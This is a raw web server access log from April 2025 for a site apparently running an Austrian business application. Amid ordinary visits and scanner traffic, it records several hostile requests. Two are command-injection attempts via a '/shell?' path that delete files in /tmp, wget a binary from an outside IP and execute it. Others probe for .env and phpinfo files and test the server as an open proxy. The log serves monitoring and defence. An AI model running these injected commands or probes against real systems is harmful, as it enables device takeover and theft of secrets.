154.81.156.54 - - [23/Apr/2025:02:25:42 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
183.250.254.92 - - [23/Apr/2025:02:27:34 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+31.58.51.98/jaws;sh+/tmp/jaws HTTP/1.1" 404 346 "-" "Hello, world"
185.255.122.19 - - [23/Apr/2025:02:30:03 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
205.210.31.218 - - [23/Apr/2025:02:32:50 +0200] "\x16\x03\x01" 400 383 "-" "-"
205.210.31.218 - - [23/Apr/2025:02:32:50 +0200] "\x16\x03\x01" 400 383 "-" "-"
43.157.201.184 - - [23/Apr/2025:03:03:52 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
154.81.156.54 - - [23/Apr/2025:03:05:10 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.218.86.4 - - [23/Apr/2025:03:13:30 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.255.122.19 - - [23/Apr/2025:03:15:15 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
87.239.191.54 - - [23/Apr/2025:03:28:35 +0200] "GET / HTTP/1.0" 200 423 "http://food-and-drink.vienna-lodgings.at/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
154.81.156.54 - - [23/Apr/2025:03:31:37 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.242.226.116 - - [23/Apr/2025:03:42:29 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
184.105.139.70 - - [23/Apr/2025:03:43:29 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15"
185.242.226.116 - - [23/Apr/2025:03:43:33 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Python/3.7 aiohttp/3.8.1"
80.82.77.202 - - [23/Apr/2025:03:45:13 +0200] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
184.105.139.70 - - [23/Apr/2025:03:47:22 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.160 Safari/537.36"
184.105.139.70 - - [23/Apr/2025:03:48:10 +0200] "GET /geoserver/web/ HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15"
184.105.139.70 - - [23/Apr/2025:03:48:56 +0200] "GET /info.php HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15"
184.105.139.70 - - [23/Apr/2025:03:48:58 +0200] "GET /phpinfo.php HTTP/1.1" 200 10237 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
184.105.139.70 - - [23/Apr/2025:03:49:01 +0200] "GET /dashboard/phpinfo.php HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0"
185.255.122.19 - - [23/Apr/2025:04:12:29 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [23/Apr/2025:04:14:11 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
196.251.86.64 - - [23/Apr/2025:04:20:32 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36"
57.129.64.237 - - [23/Apr/2025:04:35:42 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
185.255.122.19 - - [23/Apr/2025:04:45:15 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.20 - - [23/Apr/2025:04:47:54 +0200] "CONNECT ifconfig.co:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1"
154.81.156.20 - - [23/Apr/2025:04:47:54 +0200] "\x16\x03\x01" 400 383 "-" "-"
154.81.156.20 - - [23/Apr/2025:04:48:04 +0200] "-" 408 - "-" "-"
154.81.156.54 - - [23/Apr/2025:04:59:41 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [23/Apr/2025:05:20:27 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
211.225.132.251 - - [23/Apr/2025:05:26:24 +0200] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
185.255.122.19 - - [23/Apr/2025:05:42:39 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
80.82.77.202 - - [23/Apr/2025:05:56:00 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (OS/2; Warp 4.5; rv:24.0) Gecko/20100101 Firefox/24.0 SeaMonkey/2.21"
154.81.156.54 - - [23/Apr/2025:06:00:23 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
93.174.93.12 - - [23/Apr/2025:06:01:05 +0200] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
185.255.122.19 - - [23/Apr/2025:06:28:20 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [23/Apr/2025:06:31:01 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.20 - - [23/Apr/2025:06:34:48 +0200] "CONNECT ifconfig.co:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1"
154.81.156.20 - - [23/Apr/2025:06:34:48 +0200] "-" 408 - "-" "-"
154.81.156.20 - - [23/Apr/2025:06:34:48 +0200] "\x16\x03\x01" 400 383 "-" "-"
154.81.156.20 - - [23/Apr/2025:06:34:58 +0200] "-" 408 - "-" "-"
154.81.156.54 - - [23/Apr/2025:07:12:24 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.69.153.192 - - [23/Apr/2025:07:17:59 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
170.106.15.3 - - [23/Apr/2025:07:36:09 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
185.255.122.19 - - [23/Apr/2025:07:44:35 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
88.218.193.103 - - [23/Apr/2025:07:47:26 +0200] "\x16\x03\x01" 400 383 "-" "-"
88.218.193.103 - - [23/Apr/2025:07:47:26 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0"
88.218.193.103 - - [23/Apr/2025:07:47:26 +0200] "\x16\x03\x01" 400 383 "-" "-"
88.218.193.103 - - [23/Apr/2025:07:47:26 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0"
154.81.156.54 - - [23/Apr/2025:07:52:26 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [23/Apr/2025:08:30:52 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [23/Apr/2025:08:58:41 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.255.122.19 - - [23/Apr/2025:09:00:43 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
64.62.197.131 - - [23/Apr/2025:09:17:10 +0200] "\x16\x03\x01" 400 383 "-" "-"
104.152.52.221 - - [23/Apr/2025:09:42:31 +0200] "\x16\x03\x01" 400 383 "-" "-"
104.152.52.221 - - [23/Apr/2025:09:42:31 +0200] "GET / HTTP/1.1" 200 423 "-" "curl/7.61.1"
210.179.12.134 - - [23/Apr/2025:09:43:41 +0200] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
154.81.156.54 - - [23/Apr/2025:09:48:43 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
119.200.28.11 - - [23/Apr/2025:09:50:52 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ http://157.245.200.182/Binarys/Nyx4r.arm;chmod+777+/tmp/Nyx4r.arm;sh+/tmp/Nyx4r.arm" 400 383 "-" "-"
185.255.122.19 - - [23/Apr/2025:10:00:38 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
147.185.132.25 - - [23/Apr/2025:10:03:18 +0200] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
92.255.57.58 - - [23/Apr/2025:10:04:42 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.218.86.4 - - [23/Apr/2025:10:05:12 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [23/Apr/2025:10:11:46 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.242.226.116 - - [23/Apr/2025:10:15:36 +0200] "\x16\x03\x01" 400 383 "-" "-"
20.169.107.169 - - [23/Apr/2025:10:16:35 +0200] "MGLNDD_212.69.160.11_80" 400 383 "-" "-"
51.81.215.67 - - [23/Apr/2025:10:38:28 +0200] "\x16\x03\x03\x01\xa6\x01" 400 383 "-" "-"
51.81.215.73 - - [23/Apr/2025:10:38:31 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
43.153.123.4 - - [23/Apr/2025:10:40:29 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
195.184.76.5 - - [23/Apr/2025:10:48:04 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
154.81.156.54 - - [23/Apr/2025:10:57:05 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.255.122.19 - - [23/Apr/2025:11:05:30 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
92.255.57.58 - - [23/Apr/2025:11:21:45 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
154.81.156.54 - - [23/Apr/2025:11:31:43 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.255.122.19 - - [23/Apr/2025:11:37:33 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
77.119.161.159 - - [23/Apr/2025:11:51:55 +0200] "GET /layout.php HTTP/1.1" 200 815 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:51:55 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:51:55 +0200] "GET /entry.php?id=10273 HTTP/1.1" 200 1903 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:51:55 +0200] "GET /entry.php?id=10272 HTTP/1.1" 200 1159 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:51:55 +0200] "GET /entry.php?id=11412 HTTP/1.1" 200 1759 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:51:55 +0200] "GET /entry.php?id=10270 HTTP/1.1" 200 909 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:51:55 +0200] "GET /gui/javascript/jquery/css/gui-themes/jquery.tooltip.css HTTP/1.1" 200 246 "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:51:55 +0200] "GET /framework/webfx/style/toolbar/cb2.css HTTP/1.1" 200 793 "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:51:55 +0200] "GET /framework/webfx/javascript/statusbar/statusBar.js HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:51:55 +0200] "GET /gui/javascript/form_form.js?1745401915 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:51:55 +0200] "GET /gui/javascript/form_form.js?1745401915 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:51:55 +0200] "GET /gui/javascript/form_form.js?1745401915 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10270" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:51:55 +0200] "GET /gui/javascript/form_form.js?1745401915 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:51:56 +0200] "GET /gui/images/icons/cancel.gif HTTP/1.1" 200 125 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:51:56 +0200] "GET /gui/images/emptybar.gif HTTP/1.1" 200 89 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:51:56 +0200] "GET /entry.php?id=10271& HTTP/1.1" 200 934 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:51:56 +0200] "GET /entry.php?id=10287 HTTP/1.1" 200 2395 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:51:56 +0200] "GET /gui/javascript/form_form.js?1745401916 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:51:56 +0200] "GET /entry.php?id=10270& HTTP/1.1" 200 909 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:51:56 +0200] "GET /entry.php?id=10273& HTTP/1.1" 200 1901 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
80.75.212.115 - - [23/Apr/2025:11:52:17 +0200] "CONNECT api.ip.pn:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1"
77.119.161.159 - - [23/Apr/2025:11:52:00 +0200] "POST /entry.php?id=10287& HTTP/1.1" 200 1968 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:53:04 +0200] "GET /gui/javascript/form_form.js?1745401984 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:53:04 +0200] "GET /entry.php?id=10273& HTTP/1.1" 200 2012 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:53:04 +0200] "GET /framework/webfx/style/toolbar/images/cbback.gif HTTP/1.1" 404 318 "http://hausegger.activities.at/framework/webfx/style/toolbar/cb2.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:53:04 +0200] "GET /entry.php?id=10270&__app__=10006038 HTTP/1.1" 200 2230 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:53:04 +0200] "GET /entry.php?id=10271& HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:53:04 +0200] "GET /framework/webfx/javascript/navigation/outlook.js HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:53:04 +0200] "GET /framework/webfx/javascript/navigation/crossbrowser.js HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:53:04 +0200] "GET /framework/icons/navigation/arrowdown.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:53:04 +0200] "GET /framework/icons/navigation/arrowup.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:53:04 +0200] "GET /gui/images/icons/pers_einstellungen.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:53:04 +0200] "GET /gui/images/icons/default_item.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:53:04 +0200] "GET /gui/images/icons/i_resourcenverwaltung.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:53:04 +0200] "GET /undefined HTTP/1.1" 404 289 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:53:04 +0200] "GET /gui/images/icons/i_lagertransaktion.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:53:04 +0200] "GET /gui/images/icons/grundlagen.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:53:04 +0200] "GET /gui/images/icons/lagerstandorte.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:53:04 +0200] "GET /gui/images/icons/lager.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:53:04 +0200] "GET /gui/images/icons/i_artikelgruppen.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:53:04 +0200] "GET /gui/images/icons/rechnungswesen_einstellungen.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:53:04 +0200] "GET /gui/images/icons/i_artikel.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:53:04 +0200] "GET /gui/images/icons/i_einzelbestellung.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:53:04 +0200] "GET /gui/images/icons/person.png HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:53:04 +0200] "GET /gui/images/icons/i_aktionen.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
77.119.161.159 - - [23/Apr/2025:11:53:04 +0200] "GET /gui/images/icons/i_aktionstypen.gif HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0"
